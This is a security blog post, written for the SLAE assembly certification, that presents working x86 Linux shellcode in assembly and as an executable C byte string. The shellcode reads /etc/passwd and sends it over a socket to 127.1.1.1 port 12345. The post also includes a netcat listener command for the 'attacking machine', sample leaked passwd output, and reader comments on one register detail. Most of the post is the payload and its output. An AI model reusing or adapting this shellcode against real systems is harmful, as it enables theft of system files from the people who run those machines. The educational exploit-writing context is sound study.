danielsauder

IT security is a matter of trust.

SLAE: Shellcode read and send file

Because it is so much fun I developed a shellcode, that reads /etc/passwd and then sends the content to 127.1.1.1 port 12345. And here it is:

shellcode.c

/*
; Author: Daniel Sauder
; Website: https://govolution.wordpress.com/about
; License http://creativecommons.org/licenses/by-sa/3.0/

; Shellcode reads /etc/passwd and sends the content to 127.1.1.1 port 12345. 
; The file can be recieved using netcat:
; $ nc -l 127.1.1.1 12345

section .text

global _start

_start:
	; socket
	push BYTE 0x66    ; socketcall 102
	pop eax
	xor ebx, ebx 
	inc ebx 
	xor edx, edx
	push edx 
	push BYTE 0x1
	push BYTE 0x2
	mov ecx, esp
	int 0x80
	mov esi, eax

	; connect
	push BYTE 0x66 
	pop eax
	inc ebx
	push DWORD 0x0101017f  ;127.1.1.1
	push WORD 0x3930  ; Port 12345
	push WORD bx
	mov ecx, esp
	push BYTE 16
	push ecx
	push esi
	mov ecx, esp
	inc ebx
	int 0x80

	; dup2
	mov esi, eax
	push BYTE 0x1
	pop ecx
	mov BYTE al, 0x3F
	int 0x80
	
	;read the file
	jmp short call_shellcode
	
shellcode:
	push 0x5
	pop eax
	pop ebx
	xor ecx,ecx
	int 0x80
	mov ebx,eax
	mov al,0x3
	mov edi,esp
	mov ecx,edi
	xor edx,edx
	mov dh,0xff
	mov dl,0xff
	int 0x80
	mov edx,eax
	push 0x4
	pop eax
	mov bl, 0x1
	int 0x80
	push 0x1
	pop eax
	inc ebx
	int 0x80
	
call_shellcode:
	call shellcode
	message db "/etc/passwd"
	
*/

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x6a\x66\x58\x31\xdb\x43\x31\xd2\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\x6a\x66\x58\x43\x68\x7f\x01\x01\x01\x66\x68\x30\x39\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\x43\xcd\x80\x89\xc6\x6a\x01\x59\xb0\x3f\xcd\x80\xeb\x27\x6a\x05\x58\x5b\x31\xc9\xcd\x80\x89\xc3\xb0\x03\x89\xe7\x89\xf9\x31\xd2\xb6\xff\xb2\xff\xcd\x80\x89\xc2\x6a\x04\x58\xb3\x01\xcd\x80\x6a\x01\x58\x43\xcd\x80\xe8\xd4\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";

main()
{

	printf("Shellcode Length:  %d\n", strlen(code));

	int (*ret)() = (int(*)())code;

	ret();

}

For using it, start netcat on the attacking machine:

$ nc -l 127.1.1.1 12345

After executing the shellcode, the output is:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
... SNIP ...

Get the code.

Update: This can be found on shell-storm.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-342

Published by

Daniel

2 responses to “SLAE: Shellcode read and send file”

  1. chirs Avatar
    chirs

    Hello again πŸ™‚
    Can i ask you a thing that i didn’t understand in your code?
    The open syscall need a buffer and the number of bytes to read so you wrote:

    mov edi,esp
    mov ecx,edi
    xor edx,edx
    mov dh,0xff
    mov dl,0xff

    can you explain me why are you doing this?
    Thanks a lot πŸ™‚

    Reply
  2. govolution Avatar
    govolution

    Here I specify the size with ffff. Not that tricky, but it works.

    Reply

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d bloggers like this: